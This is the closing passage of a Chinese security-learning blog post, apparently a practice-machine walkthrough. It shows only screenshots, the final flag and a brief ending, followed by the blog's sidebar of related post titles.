<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128160031665.png" alt="image-20240128160031665"></p>
<p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128160110739.png" alt="image-20240128160110739"></p>
<p>得知<code>flag&#123;game_over&#125;</code></p>
<h3><span id="七-结束">七、结束</span></h3><p><img src="https://raw.githubusercontent.com/tanlinhuitlh/123/main/img/image-20240128160247432.png" alt="image-20240128160247432"></p>

    </div>
</article>


                </div>
                <aside class="col-md-4 gal-left" id="sidebar">
    <!-- 此为sidebar的搜索框, 非搜索结果页面 -->
<aside id="sidebar-search">
    <div class="search hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <form class="form-inline clearfix" id="search-form" method="get"
              action="/search/index.html">
            <input type="text" name="s" class="form-control" id="searchInput" placeholder="搜索文章~" autocomplete="off">
            <button class="btn btn-danger btn-gal" type="submit">
                <i class="fa fa-search"></i>
            </button>
        </form>
    </div>
</aside>
    <aside id="sidebar-author">
    <div class="panel panel-gal" data-aos="flip-right" data-aos-duration="3000">
        <div class="panel-heading" style="text-align: center">
            <i class="fa fa-quote-left"></i>
            明 尘
            <i class="fa fa-quote-right"></i>
        </div>
        <div class="author-panel text-center">
            <img src="/imgs/avatar.jpg" width="140" height="140"
                 alt="个人头像" class="author-image">
            <p class="author-description"></p>
        </div>
    </div>
</aside>
    
    <aside id="sidebar-recent_comments">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-comments"></i>
            最新评论
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush"></ul>
    </div>
</aside>
    
    <!-- 要配置好leancloud才能开启此小工具 -->
    
    
    <aside id="sidebar-recent_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            近期文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/25/easy-cloudantivirus%E5%92%8CMoriartyCory%20160449/">easy_cloudantivirus和MoriartyCory</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/25/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">文件包含</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/23/%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/">权限维持</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/21/webshall%E5%85%8D%E6%9D%80/">webshall免杀</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/19/beef/">beef</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/16/xss/">xss</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/12/%E9%9D%B6%E6%9C%BA%E7%BB%83%E4%B9%A0/">靶机练习</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/09/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/08/sqli%E9%80%9A%E5%85%B3/">sqli通关</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/08/tg%E6%B3%A8%E5%86%8C%E5%92%8C%E6%B0%B8%E6%81%92%E4%B9%8B%E9%BB%91/">tg注册和永恒之黑</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="sidebar-rand_posts">
    <div class="panel panel-gal recent hidden-xs" data-aos="fade-up" data-aos-duration="2000">
        <div class="panel-heading">
            <i class="fa fa-refresh"></i>
            随机文章
            <i class="fa fa-times-circle panel-remove"></i>
            <i class="fa fa-chevron-circle-up panel-toggle"></i>
        </div>
        <ul class="list-group list-group-flush">
            
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/13/php%E5%AD%A6%E4%B9%A01/">php学习1</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/06/linux%E5%91%BD%E4%BB%A4%E8%A1%A5%E5%85%85/">linux命令补充</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/12/php%E5%AD%A6%E4%B9%A0/">php学习</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/04/virtual%E5%92%8Cpicachu/">virtual和pikachu</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/01/waf%E5%92%8CBP/">waf和BP</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/21/sql%E6%B3%A8%E5%85%A52/">sql注入2</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/10/%E5%AE%89%E5%8D%93%E7%97%85%E6%AF%92%E7%9B%91%E5%90%AC/">安卓病毒监听</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/02/%E6%B8%97%E9%80%8F%E5%92%8C%E9%9D%B6%E6%9C%BA/">渗透和靶机</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2023/12/05/%E7%BD%91%E7%BB%9C%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86%E5%AD%A6%E4%B9%A0/">网络基础知识学习</a>
                </span>
            </li>
            
            <li class="list-group-item">
                <span class="post-title">
                    <a href="/2024/01/16/xss/">xss</a>
                </span>
            </li>
            
        </ul>
    </div>
</aside>
    
    
    <aside id="gal-sets">
        <div class="panel panel-gal hidden-xs" data-aos="fade-up" data-aos-duration="2000">
            <ul class="nav nav-pills pills-gal">

                
                <li>
                    <a href="/2024/01/25/easy-cloudantivirus%E5%92%8CMoriartyCory%20160449/index.html#sidebar-tags" data-toggle="tab" id="tags-tab">热门标签</a>
                </li>
                
                
                <li>
                    <a href="/2024/01/25/easy-cloudantivirus%E5%92%8CMoriartyCory%20160449/index.html#sidebar-friend-links" data-toggle="tab" id="friend-links-tab">友情链接</a>
                </li>
                
                
                <li>
                    <a href="/2024/01/25/easy-cloudantivirus%E5%92%8CMoriartyCory%20160449/index.html#sidebar-links" data-toggle="tab" id="links-tab">个人链接</a>
                </li>
                
            </ul>
            <div class="tab-content">
                
                <div class="cloud-tags tab-pane nav bs-sidenav fade" id="sidebar-tags">
    
    <a href="/tags/Linux/" style="font-size: 19.327909633910075px;" class="tag-cloud-link">Linux</a>
    
    <a href="/tags/%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" style="font-size: 17.860905184575437px;" class="tag-cloud-link">基础知识</a>
    
    <a href="/tags/DNS%E5%9F%9F%E5%90%8D%E8%A7%A3%E6%9E%90/" style="font-size: 17.22998891274999px;" class="tag-cloud-link">DNS域名解析</a>
    
    <a href="/tags/HTML/" style="font-size: 16.334187966737936px;" class="tag-cloud-link">HTML</a>
    
    <a href="/tags/CSS/" style="font-size: 14.521050920208133px;" class="tag-cloud-link">CSS</a>
    
    <a href="/tags/php/" style="font-size: 19.49043008666374px;" class="tag-cloud-link">php</a>
    
    <a href="/tags/php%E5%87%BD%E6%95%B0/" style="font-size: 8.324692447592925px;" class="tag-cloud-link">php函数</a>
    
    <a href="/tags/%E7%AE%80%E5%8D%95%E7%BD%91%E7%AB%99%E5%8A%9F%E8%83%BD%E5%AE%9E%E7%8E%B0/" style="font-size: 13.1902670122349px;" class="tag-cloud-link">简单网站功能实现</a>
    
    <a href="/tags/html/" style="font-size: 16.263107553542422px;" class="tag-cloud-link">html</a>
    
    <a href="/tags/postman/" style="font-size: 16.133991886693583px;" class="tag-cloud-link">postman</a>
    
    <a href="/tags/%E6%96%87%E4%BB%B6%E6%93%8D%E4%BD%9C/" style="font-size: 17.728560669122277px;" class="tag-cloud-link">文件操作</a>
    
    <a href="/tags/python/" style="font-size: 16.75929047625275px;" class="tag-cloud-link">python</a>
    
    <a href="/tags/%E5%8F%98%E9%87%8F/" style="font-size: 16.373631641018143px;" class="tag-cloud-link">变量</a>
    
    <a href="/tags/%E5%AD%97%E7%AC%A6%E4%B8%B2/" style="font-size: 17.93415096911277px;" class="tag-cloud-link">字符串</a>
    
    <a href="/tags/%E5%88%97%E8%A1%A8/" style="font-size: 11.039924332393547px;" class="tag-cloud-link">列表</a>
    
    <a href="/tags/%E5%85%83%E7%BB%84/" style="font-size: 11.459996493004592px;" class="tag-cloud-link">元组</a>
    
    <a href="/tags/if%E6%9D%A1%E4%BB%B6%E5%88%A4%E6%96%AD/" style="font-size: 8.09898573395885px;" class="tag-cloud-link">if条件判断</a>
    
    <a href="/tags/%E5%BE%AA%E7%8E%AF%E8%AF%AD%E5%8F%A5/" style="font-size: 8.87037947047545px;" class="tag-cloud-link">循环语句</a>
    
    <a href="/tags/%E5%AD%A6%E4%B9%A0/" style="font-size: 14.816088925459258px;" class="tag-cloud-link">学习</a>
    
    <a href="/tags/PHP/" style="font-size: 19.58150452144848px;" class="tag-cloud-link">PHP</a>
    
    <a href="/tags/Navicat/" style="font-size: 16.934260626606942px;" class="tag-cloud-link">Navicat</a>
    
    <a href="/tags/%E5%AE%89%E8%A3%85/" style="font-size: 16.738021782910522px;" class="tag-cloud-link">安装</a>
    
    <a href="/tags/sqlmap%E4%BD%BF%E7%94%A8/" style="font-size: 13.390605632524135px;" class="tag-cloud-link">sqlmap使用</a>
    
    <a href="/tags/dirsearch/" style="font-size: 19.416513296452408px;" class="tag-cloud-link">dirsearch</a>
    
    <a href="/tags/sql-%E6%B3%A8%E5%85%A5/" style="font-size: 16.97735249416846px;" class="tag-cloud-link">sql 注入</a>
    
    <a href="/tags/sqlmap/" style="font-size: 18.949773759958482px;" class="tag-cloud-link">sqlmap</a>
    
    <a href="/tags/%E8%81%94%E5%90%88%E6%9F%A5%E8%AF%A2/" style="font-size: 11.764043366432706px;" class="tag-cloud-link">联合查询</a>
    
    <a href="/tags/pikachu/" style="font-size: 17.66047783064232px;" class="tag-cloud-link">pikachu</a>
    
    <a href="/tags/virtrualbox/" style="font-size: 8.417714484210775px;" class="tag-cloud-link">virtrualbox</a>
    
    <a href="/tags/%E5%B0%8F%E7%B1%B3%E8%8C%83%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F/" style="font-size: 17.789181833180344px;" class="tag-cloud-link">小米范端口扫描</a>
    
    <a href="/tags/vue/" style="font-size: 17.14511123565186px;" class="tag-cloud-link">vue</a>
    
    <a href="/tags/waf/" style="font-size: 16.89445068565646px;" class="tag-cloud-link">waf</a>
    
    <a href="/tags/BurpSuite/" style="font-size: 14.645110536689055px;" class="tag-cloud-link">BurpSuite</a>
    
    <a href="/tags/nmap/" style="font-size: 17.102947262501594px;" class="tag-cloud-link">nmap</a>
    
    <a href="/tags/%E7%99%BE%E5%BA%A6%E8%B0%B7%E6%AD%8C%E8%AF%AD%E6%B3%95/" style="font-size: 19.87078859955325px;" class="tag-cloud-link">百度谷歌语法</a>
    
    <a href="/tags/%E6%94%AF%E4%BB%98%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E/" style="font-size: 14.392607760186696px;" class="tag-cloud-link">支付逻辑漏洞</a>
    
    <a href="/tags/%E5%BC%B1%E5%8F%A3%E4%BB%A4/" style="font-size: 19.93278104704163px;" class="tag-cloud-link">弱口令</a>
    
    <a href="/tags/%E5%8D%9A%E5%AE%A2%E6%90%AD%E5%BB%BA/" style="font-size: 9.516638763237912px;" class="tag-cloud-link">博客搭建</a>
    
    <a href="/tags/%E4%B8%BB%E9%A2%98%E9%85%8D%E7%BD%AE/" style="font-size: 16.893055518106287px;" class="tag-cloud-link">主题配置</a>
    
    <a href="/tags/sql%E7%BB%95%E8%BF%87/" style="font-size: 11.353805331776044px;" class="tag-cloud-link">sql绕过</a>
    
    <a href="/tags/sqlmap-tamper/" style="font-size: 13.522793620353074px;" class="tag-cloud-link">sqlmap tamper</a>
    
    <a href="/tags/sql%E6%8A%A5%E9%94%99%E5%87%BD%E6%95%B0/" style="font-size: 17.72213934302548px;" class="tag-cloud-link">sql报错函数</a>
    
    <a href="/tags/bool%E5%92%8C%E7%9D%A1%E7%9C%A0%E7%9B%B2%E6%B3%A8%E8%84%9A%E6%9C%AC/" style="font-size: 9.907318931222562px;" class="tag-cloud-link">bool和睡眠盲注脚本</a>
    
    <a href="/tags/ip%E5%92%8C%E8%B7%AF%E7%94%B1/" style="font-size: 19.591171357207237px;" class="tag-cloud-link">ip和路由</a>
    
    <a href="/tags/proxifier/" style="font-size: 8.133078857122836px;" class="tag-cloud-link">proxifier</a>
    
    <a href="/tags/wireshark%E6%8A%93%E5%8C%85/" style="font-size: 14.827359759530246px;" class="tag-cloud-link">wireshark抓包</a>
    
    <a href="/tags/webshall%E5%85%8D%E6%9D%80/" style="font-size: 15.439964371461167px;" class="tag-cloud-link">webshall免杀</a>
    
    <a href="/tags/%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC/" style="font-size: 13.053495493612816px;" class="tag-cloud-link">一句话木马</a>
    
    <a href="/tags/windows%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" style="font-size: 10.411152515703971px;" class="tag-cloud-link">windows权限维持</a>
    
    <a href="/tags/Linux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81/" style="font-size: 14.633448838669839px;" class="tag-cloud-link">Linux权限维持</a>
    
    <a href="/tags/Hackademic-RTB1/" style="font-size: 16.010957353291758px;" class="tag-cloud-link">Hackademic.RTB1</a>
    
    <a href="/tags/Medium/" style="font-size: 16.963674442998112px;" class="tag-cloud-link">Medium</a>
    
</div>
                
                
                <div class="friend-links tab-pane nav bs-sidenav fade" id="sidebar-friend-links">
    
    <li>
        <a href="http://kdays.net/days/" target="_blank">KDays Forum</a>
    </li>
    
    <li>
        <a href="http://www.gal123.com/" target="_blank">绅士导航♂</a>
    </li>
    
    <li>
        <a href="http://www.moe123.com/" target="_blank">萌导航</a>
    </li>
    
</div>
                
                
                <div class="links tab-pane nav bs-sidenav fade" id="sidebar-links">
    
    <li>
        <a href="https://github.com/tanlinhuitlh/" target="_blank">Github</a>
    </li>
    
    <li>
        <a href="https://coding.net/u/SORA1" target="_blank">Coding</a>
    </li>
    
    <li>
        <a href="https://www.zhihu.com/people/aonosora/activities" target="_blank">知乎</a>
    </li>
    
</div>
                
            </div>
        </div>
    </aside>
    
</aside>
            </div>
        </div>
    </div>
    <footer id="gal-footer">
    <div class="container">
        Copyright © 2018 明 尘 Powered by <a href="https://hexo.io/" target="_blank">Hexo</a>.&nbsp;Theme by <a href="https://github.com/ZEROKISEKI" target="_blank">AONOSORA</a>
    </div>
</footer>

<!-- 回到顶端 -->
<div id="gal-gotop">
    <i class="fa fa-angle-up"></i>
</div>
</body>

<script src="/js/activate-power-mode.js"></script>

<script>

    // 配置highslide
	hs.graphicsDir = '/js/highslide/graphics/'
    hs.outlineType = "rounded-white";
    hs.dimmingOpacity = 0.8;
    hs.outlineWhileAnimating = true;
    hs.showCredits = false;
    hs.captionEval = "this.thumb.alt";
    hs.numberPosition = "caption";
    hs.align = "center";
    hs.transitions = ["expand", "crossfade"];
    hs.lang.number = '共%2张图, 当前是第%1张';
    hs.addSlideshow({
      interval: 5000,
      repeat: true,
      useControls: true,
      fixedControls: "fit",
      overlayOptions: {
        opacity: 0.75,
        position: "bottom center",
        hideOnMouseOut: true
      }
    })

    // 初始化aos
    AOS.init({
      duration: 1000,
      delay: 0,
      easing: 'ease-out-back'
    });

</script>
<script>
	POWERMODE.colorful = 'true';    // make power mode colorful
	POWERMODE.shake = 'true';       // turn off shake
	// TODO 这里根据具体情况修改
	document.body.addEventListener('input', POWERMODE);
</script>
<script>
    window.slideConfig = {
      prefix: '/imgs/slide/background',
      ext: 'jpg',
      maxCount: '8'
    }
</script>

<script src="/js/hs.js"></script>
<script src="/js/blog.js"></script>




</html>